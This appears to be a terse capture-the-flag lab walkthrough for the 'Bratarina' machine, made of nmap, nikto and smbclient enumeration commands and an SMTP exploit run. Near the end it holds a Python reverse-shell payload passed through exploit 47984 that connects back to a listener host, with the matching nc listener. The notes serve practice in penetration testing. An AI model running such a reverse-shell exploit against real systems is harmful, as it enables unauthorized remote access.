nmap -A -p- -oA bratarina 192.168.139.71 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA bratarina 192.168.139.71

nmap -sU -O -p- -oA bratarina-udp 192.168.139.71

nikto -h 10.129.139.71:80

Pasted image 20210816133925.png

Pasted image 20211001070033.png

Pasted image 20211001070227.png

smbclient -N -L ////192.168.139.71

![[Pasted image 20211001070849.png]]

smbclient -N \\\\192.168.139.71\\backups

![[Pasted image 20211001071057.png]]

searchsploit smtp

searchsploit -m 47984

Pasted image 20211001071401.png

python3 47984.py 192.168.139.71 25 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.163\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'

nc -lvnp 80

Pasted image 20211001071848.png

boxes

copyright©2022 Cu3rv0x all rights reserved